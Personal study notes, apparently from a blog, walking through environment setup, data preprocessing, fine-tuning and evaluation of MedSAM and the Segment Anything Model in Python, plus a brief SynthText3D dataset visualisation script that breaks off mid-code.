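Once downloaded, the .bin model can be loaded with the fasttext Python package to obtain the 300-dimensional word vectors SEED uses as semantic supervision; a quick sketch (the path is assumed):

import fasttext

model = fasttext.load_model('cc.en.300.bin')  # takes a while; the model is several GB in memory
vec = model.get_word_vector('text')           # 300-dimensional numpy array
print(vec.shape)                              # (300,)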

Paper: Segment Anything in Medical Images (MedSAM)

Notes

Code

Configuration

Create a new conda environment:

conda create -n medsam python=3.10 -y

Activate it:

conda activate medsam

Install PyTorch offline:

Download the matching torch and torchvision wheels from download.pytorch.org/whl/torch_stable.html.

Install them:

pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

Download the repository: bowang-lab/MedSAM, the official repository of "MedSAM: Segment Anything in Medical Images" (github.com).

In the repository folder:

pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

Fine-tuning SAM on a custom dataset

1. Open pre_CT.py and see what the parser actually defines:

# set up the parser
parser = argparse.ArgumentParser(description='preprocess CT images')
parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

parser.add_argument('--image_size', type=int, default=256, help='image size')
parser.add_argument('--modality', type=str, default='CT', help='modality')
parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
parser.add_argument('--label_id', type=int, default=9, help='label id')
parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
parser.add_argument('--device', type=str, default='cuda:0', help='device')
# seed
parser.add_argument('--seed', type=int, default=2023, help='random seed')
args = parser.parse_args()
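Given those defaults, a typical run only needs the paths overridden; a hypothetical invocation (adjust to your data layout):

python pre_CT.py -i data/FLARE22Train/images -gt data/FLARE22Train/labels -o data/Npz_files --label_id 9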
2D

Hit two more pitfalls; patch them:

pip install chardet
pip install --force-reinstall charset-normalizer==3.1.0

Now it runs!

Reading the code

set up the parser

# Get all file names under args.gt_path, sorted lexicographically, into names.
names = sorted(os.listdir(args.gt_path))
# Join args.npz_path and args.model_type into a new path save_path.
save_path = args.npz_path + '_' + args.model_type
# Create save_path; with exist_ok=True an existing directory is left alone,
# otherwise the directory and all its parents are created.
os.makedirs(save_path, exist_ok=True)
# Print the number of images, i.e. the length of names.
print('image number:', len(names))

set up the model

# Initialise the model from args.model_type and args.checkpoint, then move it to args.device.
sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

convert 2d grey or rgb images to npz file

imgs = []            # images
gts = []             # labels
img_embeddings = []  # image embeddings

# Iterate over the ground-truth folder; names defaults to the sorted file list
# under args.gt_path ('data/MedSAMDemo_2D/train/labels').
for gt_name in tqdm(names):
    image_name = gt_name.split('.')[0] + args.img_name_suffix  # file name + suffix
    gt_data = io.imread(join(args.gt_path, gt_name))  # read the ground truth
    if len(gt_data.shape) == 3:  # if gt_data has three dims, keep only the first channel (greyscale)
        gt_data = gt_data[:, :, 0]
    assert len(gt_data.shape) == 2, 'ground truth should be 2D'  # the label must be 2D (height and width)
    # Resize the label to args.image_size and binarise it: pixels equal to
    # args.label_id become 1, everything else becomes 0, and the result is
    # resized. transform.resize comes from scikit-image: order=0 selects
    # nearest-neighbour interpolation, preserve_range=True keeps the value
    # range unchanged, and mode='constant' pads the borders with a constant.
    # The result is a binary image containing only 0s and 1s.
    gt_data = transform.resize(gt_data == args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
    # Convert gt_data to 8-bit unsigned integers.
    gt_data = np.uint8(gt_data)

    # exclude tiny objects: only preprocess the source image and add it to the
    # dataset when the label contains more than 100 pixels
    if np.sum(gt_data) > 100:
        # The maximum is 1 and there are exactly two pixel values: the label must be binary.
        assert np.max(gt_data) == 1 and np.unique(gt_data).shape[0] == 2, 'ground truth should be binary'
        # Read the image data.
        image_data = io.imread(join(args.img_path, image_name))
        # If the image has an alpha channel, keep only the first three (RGB) channels.
        if image_data.shape[-1] > 3 and len(image_data.shape) == 3:
            image_data = image_data[:, :, :3]
        # If the image has a single channel, repeat it three times to get RGB.
        if len(image_data.shape) == 2:
            image_data = np.repeat(image_data[:, :, None], 3, axis=-1)
        # nii preprocess start
        # Determine the intensity window: np.percentile gives the 0.5th and
        # 99.5th percentiles of the pixel values, used as the lower/upper
        # bounds for the normalisation below.
        lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
        # Clip the pixel values to [lower_bound, upper_bound].
        image_data_pre = np.clip(image_data, lower_bound, upper_bound)
        # Min-max normalise to 0-255: subtract the minimum, divide by the value
        # range, multiply by 255. This removes the influence of the original
        # intensity range and gives the model consistently scaled input, since
        # many models expect normalised image data.
        image_data_pre = (image_data_pre - np.min(image_data_pre)) / (np.max(image_data_pre) - np.min(image_data_pre)) * 255.0
        # Zero out the background (black) pixels.
        image_data_pre[image_data == 0] = 0
        # Resize with cubic interpolation (order=3) and anti-aliasing, which
        # smooths the image while keeping its value range.
        image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
        # Convert the pixel values to 8-bit unsigned integers.
        image_data_pre = np.uint8(image_data_pre)

        # Append the preprocessed image to imgs.
        imgs.append(image_data_pre)
        # Assert the >100-pixel condition again (why check twice? smells like legacy code).
        assert np.sum(gt_data) > 100, 'ground truth should have more than 100 pixels'
        # Append the preprocessed label to gts.
        gts.append(gt_data)
        # resize image to 3*1024*1024
        # ResizeLongestSide rescales images and coordinates by their longest
        # side; it provides apply_image and apply_coords for images and
        # coordinates respectively.
        sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
        # Apply it to image_data_pre, producing the resized image resize_img.
        resize_img = sam_transform.apply_image(image_data_pre)
        # Convert the numpy array resize_img to a PyTorch tensor (CHW) and move it to the GPU.
        resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
        # Run SAM's preprocessing on the image (e.g. mean/std normalisation and padding).
        input_image = sam_model.preprocess(resize_img_tensor[None, :, :, :])  # (1, 3, 1024, 1024)
        assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
        # pre-compute the image embedding
        # Run the image encoder to extract the image embedding.
        with torch.no_grad():
            embedding = sam_model.image_encoder(input_image)
            img_embeddings.append(embedding.cpu().numpy()[0])
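For reference, sam_model.preprocess in the SAM codebase normalises by the model's pixel mean/std and zero-pads the image to a square of img_size; roughly the following (a sketch of the idea, not the repo's exact code):

import torch.nn.functional as F

def preprocess_like_sam(x, pixel_mean, pixel_std, img_size=1024):
    # x: (1, 3, H, W) whose longest side already equals img_size.
    x = (x - pixel_mean) / pixel_std                  # per-channel normalisation
    h, w = x.shape[-2:]
    x = F.pad(x, (0, img_size - w, 0, img_size - h))  # pad right/bottom to a square
    return x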

      save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

      stack the list to array

# save all 2D images plus their ground truth and image embeddings into one npz file
if len(imgs) > 1:
    imgs = np.stack(imgs, axis=0)  # (n, 256, 256, 3): n RGB images of size 256x256
    gts = np.stack(gts, axis=0)  # (n, 256, 256): n greyscale label maps of size 256x256
    img_embeddings = np.stack(img_embeddings, axis=0)  # (n, 1, 256, 64, 64): one 256x64x64 embedding per image
    # save the three numpy arrays into one npz file via np.savez_compressed,
    # under the keyword arguments imgs, gts and img_embeddings
    np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
    # save an example image for sanity check: pick a random image for visual inspection
    idx = np.random.randint(imgs.shape[0])  # random index idx
    # extract the image img_idx and ground truth gt_idx at that index
    img_idx = imgs[idx, :, :, :]
    gt_idx = gts[idx, :, :]
    # find_boundaries from scikit-image locates the edges of each object in gt_idx
    bd = segmentation.find_boundaries(gt_idx, mode='inner')
    # colour the boundary pixels red
    img_idx[bd, :] = [255, 0, 0]
    # save the annotated img_idx as a png for visual inspection
    io.imsave(save_path + '.png', img_idx, check_contrast=False)

      finetune_and_inference_tutorial_2D_dataset.ipynb

Once the preprocessed dataset is ready, you can run finetune_and_inference_tutorial_2D_dataset.ipynb to fine-tune the SAM model.
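Before fine-tuning, it is worth a quick sanity check that the npz file written above has the expected contents. A minimal sketch (the file name demo2D.npz is an assumption based on the data_name used in the demo):

import numpy as np

# the keys below match the savez_compressed call in the preprocessing script
data = np.load('data/demo2D_vit_b/demo2D.npz')
print(list(data.keys()))  # ['imgs', 'gts', 'img_embeddings']
print(data['imgs'].shape, data['gts'].shape, data['img_embeddings'].shape)
# expected: (n, 256, 256, 3) (n, 256, 256) (n, 1, 256, 64, 64)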

      class NpzDataset(Dataset)

class NpzDataset(Dataset):
    def __init__(self, data_root):
        # read all .npz files under the given directory
        self.data_root = data_root
        self.npz_files = sorted(os.listdir(self.data_root))
        self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
        # this implementation is ugly but it works (and is also fast for feeding data to GPU)
        # if your server has enough RAM; as an alternative, you can also use a list of npy
        # files and load them one by one
        # np.vstack() stacks the arrays vertically, merging the gts and img_embeddings
        # fields of every file into two numpy arrays: ori_gts and img_embeddings
        self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
        self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
        # useful debug output: the shapes of img_embeddings and ori_gts actually read from disk
        print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

    def __len__(self):
        """
        Return the size of the dataset (the number of samples), here the first dimension
        of ori_gts. Since __init__ already merged the gts fields of all npz files into one
        array, this is the total number of targets across all files read.
        """
        return self.ori_gts.shape[0]

    def __getitem__(self, index):
        # image embedding
        img_embed = self.img_embeddings[index]
        # ground truth
        gt2D = self.ori_gts[index]
        # bounding box
        y_indices, x_indices = np.where(gt2D > 0)
        x_min, x_max = np.min(x_indices), np.max(x_indices)
        y_min, y_max = np.min(y_indices), np.max(y_indices)
        # add perturbation to bounding box coordinates (data augmentation)
        H, W = gt2D.shape
        x_min = max(0, x_min - np.random.randint(0, 20))
        x_max = min(W, x_max + np.random.randint(0, 20))
        y_min = max(0, y_min - np.random.randint(0, 20))
        y_max = min(H, y_max + np.random.randint(0, 20))
        bboxes = np.array([x_min, y_min, x_max, y_max])
        # convert img embedding, mask, bounding box to torch tensors and return the triple
        # (image embedding img_embed, 2D ground truth gt2D, bounding box coordinates bboxes)
        return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :, :]).long(), torch.tensor(bboxes).float()

      test dataset class and dataloader

npz_tr_path = 'data/demo2D_vit_b'
# create a new NpzDataset instance from npz_tr_path
demo_dataset = NpzDataset(npz_tr_path)
# before training, read one mini-batch from demo_dataloader to check that the dataset
# and dataloader work; with batch_size=8, each iteration yields 8 samples
demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
for img_embed, gt2D, bboxes in demo_dataloader:
    # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
    # print the shapes of the first mini-batch to confirm they match expectations
    print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
    # break after the first mini-batch, so only its shapes are printed
    break

self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

      set up model for fine-tuning

# train data path
npz_tr_path = 'data/demo2D_vit_b'  # training data
work_dir = './work_dir'  # working directory
task_name = 'demo2D'  # task name
# prepare SAM model
model_type = 'vit_b'  # model type
checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth'  # pretrained checkpoint
device = 'cuda:0'  # device
model_save_path = join(work_dir, task_name)  # where to save the model
os.makedirs(model_save_path, exist_ok=True)
sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)  # load the model
sam_model.train()  # switch to training mode
# Set up the optimizer, hyperparameter tuning will improve performance here
optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0)  # optimizer
# The segmentation loss combines DiceLoss and CrossEntropyLoss: Dice measures how far the
# predicted segmentation deviates from the ground truth, while cross-entropy scores the
# per-pixel classification against the target.
seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean')  # loss function

      training

The original author used an NVIDIA RTX A5500 with 24 GB of VRAM, while my RTX 4060 only has 8 GB, so I had to turn batch_size down; I set it to 8. VRAM usage stayed around 2 GB throughout training, so it could probably be increased a bit.
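To see how much headroom is actually left before raising batch_size, PyTorch's CUDA memory counters help; a minimal sketch (run it after a few training steps; the device string matches the setup above):

import torch

peak_alloc = torch.cuda.max_memory_allocated('cuda:0') / 1024**3    # peak memory held by tensors
peak_reserved = torch.cuda.max_memory_reserved('cuda:0') / 1024**3  # peak memory reserved by the caching allocator (closer to what nvidia-smi shows)
print(f'peak allocated: {peak_alloc:.2f} GiB, peak reserved: {peak_reserved:.2f} GiB')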

num_epochs = 100  # number of epochs
losses = []  # per-epoch loss values
best_loss = 1e10  # best loss so far
train_dataset = NpzDataset(npz_tr_path)  # load the training data
# dataloader that batches the samples (batch size 64 here; the run logged below used 8) and shuffles them
train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
for epoch in range(num_epochs):
    epoch_loss = 0
    # train
    # step is the index of the current batch
    # image_embedding is the pre-computed image embedding
    # gt2D is the ground-truth mask of the batch
    # boxes are the ground-truth 2D bounding boxes
    for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
        # do not compute gradients for image encoder and prompt encoder (they stay frozen)
        with torch.no_grad():
            # convert box to 1024x1024 grid: map the box coordinates from the original
            # frame onto the 1024x1024 grid
            box_np = boxes.numpy()
            sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
            # rescale the prompt boxes
            box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
            # convert to a PyTorch tensor
            box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
            if len(box_torch.shape) == 2:
                # If box_torch has shape (B, 4) — B is the batch size and 4 are the box
                # coordinates (top-left and bottom-right corners) — expand it to (B, 1, 4)
                # so later computations see a consistent shape and no dimension-mismatch
                # errors occur.
                box_torch = box_torch[:, None, :]  # (B, 1, 4)
            # get prompt embeddings
            sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
                points=None,  # no point prompts
                boxes=box_torch,  # use the bounding boxes as prompts
                masks=None,  # no mask prompts
            )
        # predicted masks: forward pass through the (trainable) mask decoder
        mask_predictions, _ = sam_model.mask_decoder(
            image_embeddings=image_embedding.to(device),  # (B, 256, 64, 64)
            image_pe=sam_model.prompt_encoder.get_dense_pe(),  # (1, 256, 64, 64)
            sparse_prompt_embeddings=sparse_embeddings,  # (B, 2, 256)
            dense_prompt_embeddings=dense_embeddings,  # (B, 256, 64, 64)
            multimask_output=False,
        )

        # compute the loss
        loss = seg_loss(mask_predictions, gt2D.to(device))
        # backpropagation
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        # accumulate the loss
        epoch_loss += loss.item()

    epoch_loss /= step  # note: step is the last batch index, so this divides by num_batches - 1
    losses.append(epoch_loss)
    print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
    # save the latest model checkpoint
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth'))
    # save the best model
    if epoch_loss < best_loss:
        best_loss = epoch_loss
        torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_best.pth'))
      self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
      100%|██████████| 57/57 [00:09<00:00, 5.95it/s]
      EPOCH: 0, Loss: 0.2000392587589366
      ……
      100%|██████████| 57/57 [00:05<00:00, 11.29it/s]
      EPOCH: 99, Loss: 0.03958414628037384

      plot loss

plt.plot(losses)
plt.title('Dice + Cross Entropy Loss')
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.savefig(join(model_save_path, 'train_loss.png'))  # save before show(), otherwise the saved figure may be blank
plt.show()  # comment this line if you are running on a server
plt.close()

If I set PyCharm's theme to dark, the figures matplotlib produces also come out dark…
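That is the IDE's dark stylesheet leaking into matplotlib. Forcing the default style before plotting brings the white background back; a minimal sketch:

import matplotlib.pyplot as plt

plt.style.use('default')  # override the dark stylesheet injected by the IDE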

      png

      load the original SAM model

from skimage import io
# load the original SAM model onto the GPU
ori_sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device)
# create the predictor
ori_sam_predictor = SamPredictor(ori_sam_model)

# read the test set
ts_img_path = 'data/MedSAMDemo_2D/test/images'
ts_gt_path = 'data/MedSAMDemo_2D/test/labels'
test_names = sorted(os.listdir(ts_img_path))

# random select a test case
img_idx = np.random.randint(len(test_names))  # random index
image_data = io.imread(join(ts_img_path, test_names[img_idx]))  # read the image
if image_data.shape[-1] > 3 and len(image_data.shape) == 3:  # keep only the 3 RGB channels
    image_data = image_data[:, :, :3]
if len(image_data.shape) == 2:  # expand single-channel greyscale to 3 channels
    image_data = np.repeat(image_data[:, :, None], 3, axis=-1)
# read ground truth (gt should have the same name as the image) and simulate a bounding box
def get_bbox_from_mask(mask):
    '''
    Returns a bounding box from a mask:
    extract the box coordinates from the ground truth, used to prompt the model
    '''
    y_indices, x_indices = np.where(mask > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    H, W = mask.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))

    return np.array([x_min, y_min, x_max, y_max])

# read the ground truth
gt_data = io.imread(join(ts_gt_path, test_names[img_idx]))
bbox_raw = get_bbox_from_mask(gt_data)

# preprocess: cut-off and max-min normalization
lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
image_data_pre = np.clip(image_data, lower_bound, upper_bound)  # clip to the intensity bounds
image_data_pre = (image_data_pre - np.min(image_data_pre)) / (np.max(image_data_pre) - np.min(image_data_pre)) * 255.0
image_data_pre[image_data == 0] = 0
image_data_pre = np.uint8(image_data_pre)
H, W, _ = image_data_pre.shape

# predict the segmentation mask using the original SAM model
ori_sam_predictor.set_image(image_data_pre)
ori_sam_seg, _, _ = ori_sam_predictor.predict(point_coords=None, box=bbox_raw, multimask_output=False)

      predict the segmentation mask using the fine-tuned model

# resize image to 3*1024*1024
# use ResizeLongestSide to resize the original image into a 3x1024x1024 tensor
sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
resize_img = sam_transform.apply_image(image_data_pre)
# convert the resized image to a PyTorch tensor
resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(device)
input_image = sam_model.preprocess(resize_img_tensor[None, :, :, :])  # (1, 3, 1024, 1024)
assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'

with torch.no_grad():
    # pre-compute the image embedding with the model's image_encoder
    ts_img_embedding = sam_model.image_encoder(input_image)
    # convert box to 1024x1024 grid
    bbox = sam_trans.apply_boxes(bbox_raw, (H, W))
    print(f'{bbox_raw=} -> {bbox=}')
    box_torch = torch.as_tensor(bbox, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
        box_torch = box_torch[:, None, :]  # (B, 4) -> (B, 1, 4)

    # compute the sparse and dense prompt embeddings with the prompt_encoder
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
        points=None,
        boxes=box_torch,
        masks=None,
    )
    medsam_seg_prob, _ = sam_model.mask_decoder(
        image_embeddings=ts_img_embedding.to(device),  # (B, 256, 64, 64)
        image_pe=sam_model.prompt_encoder.get_dense_pe(),  # (1, 256, 64, 64)
        sparse_prompt_embeddings=sparse_embeddings,  # (B, 2, 256)
        dense_prompt_embeddings=dense_embeddings,  # (B, 256, 64, 64)
        multimask_output=False,
    )
    medsam_seg_prob = torch.sigmoid(medsam_seg_prob)  # squash the logits into [0, 1]
    # convert soft mask to hard mask
    medsam_seg_prob = medsam_seg_prob.cpu().numpy().squeeze()
    medsam_seg = (medsam_seg_prob > 0.5).astype(np.uint8)
    print(medsam_seg.shape)
      bbox_raw=array([164, 159, 189, 187], dtype=int64) -> bbox=array([[656, 636, 756, 748]], dtype=int64)
      (256, 256)

compute the accuracy

The comparison shows that this fine-tuning really does deliver!

      ori_sam_dsc = compute_dice_coefficient(gt_data>0, ori_sam_seg>0)
      medsam_dsc = compute_dice_coefficient(gt_data>0, medsam_seg>0)
      print('Original SAM DSC: {:.4f}'.format(ori_sam_dsc), 'MedSAM DSC: {:.4f}'.format(medsam_dsc))
      Original SAM DSC: 0.7397 MedSAM DSC: 0.9145
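compute_dice_coefficient comes from the tutorial's utility code (not shown here). For reference, a minimal sketch of the Dice similarity coefficient it computes, assuming two boolean masks of the same shape:

import numpy as np

def dice_coefficient(mask_gt, mask_pred):
    # DSC = 2 * |A ∩ B| / (|A| + |B|)
    volume_sum = mask_gt.sum() + mask_pred.sum()
    if volume_sum == 0:
        return np.nan  # both masks empty: DSC undefined
    volume_intersect = (mask_gt & mask_pred).sum()
    return 2 * volume_intersect / volume_sum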

      visualization functions

# visualization functions
# source: https://github.com/facebookresearch/segment-anything/blob/main/notebooks/predictor_example.ipynb
# change color to avoid red and green
def show_mask(mask, ax, random_color=False):
    if random_color:
        color = np.concatenate([np.random.random(3), np.array([0.6])], axis=0)
    else:
        color = np.array([251/255, 252/255, 30/255, 0.6])
    h, w = mask.shape[-2:]
    mask_image = mask.reshape(h, w, 1) * color.reshape(1, 1, -1)
    ax.imshow(mask_image)

def show_box(box, ax):
    x0, y0 = box[0], box[1]
    w, h = box[2] - box[0], box[3] - box[1]
    ax.add_patch(plt.Rectangle((x0, y0), w, h, edgecolor='blue', facecolor=(0, 0, 0, 0), lw=2))

_, axs = plt.subplots(1, 3, figsize=(25, 25))
axs[0].imshow(image_data)
show_mask(gt_data > 0, axs[0])
# show_box(box_np[img_id], axs[0])
# axs[0].set_title('Mask with Tuned Model', fontsize=20)
axs[0].axis('off')

axs[1].imshow(image_data)
show_mask(ori_sam_seg, axs[1])
show_box(bbox_raw, axs[1])
# add text to image to show dice score
axs[1].text(0.5, 0.5, 'SAM DSC: {:.4f}'.format(ori_sam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[1].set_title('Mask with Untuned Model', fontsize=20)
axs[1].axis('off')

axs[2].imshow(image_data)
show_mask(medsam_seg, axs[2])
show_box(bbox_raw, axs[2])
# add text to image to show dice score
axs[2].text(0.5, 0.5, 'MedSAM DSC: {:.4f}'.format(medsam_dsc), fontsize=30, horizontalalignment='left', verticalalignment='top', color='yellow')
# axs[2].set_title('Ground Truth', fontsize=20)
axs[2].axis('off')
plt.subplots_adjust(wspace=0.01, hspace=0)  # adjust spacing before show()
plt.show()
# save plot
# plt.savefig(join(model_save_path, test_npzs[npz_idx].split('.npz')[0] + str(img_id).zfill(3) + '.png'), bbox_inches='tight', dpi=300)
plt.close()

      png

Paper-Segment Anything

Notes

Code

Setting up the environment

Create a new conda environment:

      conda create -n segment-anything python=3.9

Install PyTorch via offline installation (after being burned n times I've gradually gotten the hang of it, orz — the offline route just works better): download the matching versions of torch and torchvision from download.pytorch.org/whl/torch_stable.html.

      png

      conda activate segment-anything

Change into the download directory:

pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl

pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl

Download the code from facebookresearch/segment-anything: The repository provides code for running inference with the SegmentAnything Model (SAM), links for downloading the trained model checkpoints, and example notebooks that show how to use the model. (github.com):

      png

From the root directory of the downloaded repository, install segment-anything:

      pip install -e .

Download the pretrained model sam_vit_h_4b8939.pth (ViT-H SAM model) and place it in the repository root as well:

Other models are also available:


        png

Run!

1. Import the required libraries

        import torch
        import torchvision
        print("PyTorch version:", torch.__version__)
        print("Torchvision version:", torchvision.__version__)
        print("CUDA is available:", torch.cuda.is_available())
        PyTorch version: 1.13.1+cu117
         Torchvision version: 0.14.1+cu117
         CUDA is available: True
         
import numpy as np
import torch
import matplotlib.pyplot as plt
import cv2

import sys
sys.path.append("..")
from segment_anything import sam_model_registry, SamAutomaticMaskGenerator, SamPredictor

# prevent the kernel from crashing when using matplotlib
import os
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"

2. Read the image to segment

image = cv2.imread('images/chess.jpg')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)

plt.figure(figsize=(10, 10))
plt.imshow(image)
plt.axis('off')
plt.show()

        png

3. Load the segmentation model

        sam_checkpoint = "../sam_vit_h_4b8939.pth"
        model_type = "vit_h"

        device = "cuda"

        sam = sam_model_registry[model_type](checkpoint=sam_checkpoint)
        sam.to(device=device)


4. Set the parameters

There are several tunable parameters in automatic mask generation that control how densely points are sampled and the thresholds for removing low-quality or duplicate masks.
In addition, generation can run automatically on crops of the image to improve performance on smaller objects, and post-processing can remove stray pixels and holes. Here is an example configuration that samples more masks: https://github.com/facebookresearch/segment-anything/blob/9e1eb9fdbc4bca4cd0d948b8ae7fe505d9f4ebc7/segment_anything/automatic_mask_generator.py#L35

mask_generator_ = SamAutomaticMaskGenerator(
    model=sam,
    points_per_side=64,
    pred_iou_thresh=0.98,
    stability_score_thresh=0.96,
    crop_n_layers=1,
    crop_n_points_downscale_factor=2,
    min_mask_region_area=100,  # Requires open-cv to run post-processing
)

5. Segment

masks = mask_generator_.generate(image)

print(len(masks))  # number of masks produced
        55
         

Mask generation returns a list over masks, where each mask is a dictionary containing various data about the mask. The keys are:


• segmentation: the mask itself
• area: the area of the mask in pixels
• bbox: the boundary box of the mask in XYWH format
• predicted_iou: the model's own prediction for the quality of the mask
• point_coords: the sampled input point that generated this mask
• stability_score: an additional measure of mask quality
• crop_box: the crop of the image used to generate this mask, in XYWH format
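To confirm these keys on your own run, you can inspect one entry of the masks list returned by generate() above; a small sketch:

m = masks[0]
print(sorted(m.keys()))
# ['area', 'bbox', 'crop_box', 'point_coords', 'predicted_iou', 'segmentation', 'stability_score']
print(m['segmentation'].shape, m['segmentation'].dtype)  # (H, W) bool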
def show_anns(anns):
    if len(anns) == 0:
        return
    sorted_anns = sorted(anns, key=(lambda x: x['area']), reverse=True)
    # plt.gca() returns the Axes object of the current figure. When drawing several
    # subplots you can place them with subplot(), but to customise one further you need
    # its Axes object; gca() gives you the current one, on which you can set axis
    # ranges, labels, ticks, and so on.
    ax = plt.gca()
    ax.set_autoscale_on(False)
    polygons = []
    color = []
    for ann in sorted_anns:
        m = ann['segmentation']  # the mask
        img = np.ones((m.shape[0], m.shape[1], 3))
        color_mask = np.random.random((1, 3)).tolist()[0]
        for i in range(3):  # random colour
            img[:, :, i] = color_mask[i]
        # np.dstack((img, m * 0.35)) stacks the colour image img and the alpha layer
        # m * 0.35 along the third (depth) axis, producing an RGBA array whose alpha is
        # 0.35 inside the mask and 0 outside — effectively a translucent colour overlay.
        # ax.imshow() then renders that array on the Axes object.
        ax.imshow(np.dstack((img, m * 0.35)))

plt.figure(figsize=(10, 10))
plt.imshow(image)
show_anns(masks)
plt.axis('off')
plt.show()

      png

Paper-SynthText3D-Synthesizing Scene Text Images from 3D Virtual Worlds

      5. Conclusion

A quick wrap-up and that's it.

Code

Dataset visualization

import numpy as np
import cv2
import os
import matplotlib.pyplot as plt

index = 27

image_dir = r'E:\dataset\Synth3D-10K\img\\'
label_dir = r'E:\dataset\Synth3D-10K\label\\'

image_path = os.path.join(image_dir, str(index) + '.jpg')
label_path = os.path.join(label_dir, str(index) + '.txt')

image_origin = cv2.imread(image_path)
image = image_origin.copy()
height, width, _ = image.shape

with open(label_path, "r") as file:
    data = file.read()

lines = data.split("\n")  # split the text into lines
result = []
for line in lines:
    if len(line) > 1:
        values = line.split(",")  # split each line by commas
        result.extend([float(s) for s in values])

# group the flat coordinate list into quadrilaterals: four x values and four y values each
x_list = [result[::2][i:i+4] for i in range(0, len(result[::2]), 4)]
y_list = [result[1::2][i:i+4] for i in range(0, len(result[1::2]), 4)]

for i in range(len(x_list)):
    x = x_list[i]
    y = y_list[i]
    points = np.array([x, y], np.int32).T
    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
        cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
axes = axes.flatten()

axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
axes[0].axis('off')
axes[0].set_title('Origin')

axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
axes[1].axis('off')
axes[1].set_title('Annotation')

plt.tight_layout()
plt.show()

      png

But on manual inspection, the quality of some images really leaves something to be desired. Does this actually work?

      png

Converting to the TotalText format

import numpy as np
import os
from tqdm import tqdm

label_dir = r'E:\dataset\Synth3D-10K\label'
save_dir = r"E:\dataset\Synth3D-10K\Txts"

for index in tqdm(range(1, 10000 + 1)):
    label_path = os.path.join(label_dir, str(index) + '.txt')

    with open(label_path, "r") as file:
        data = file.read()

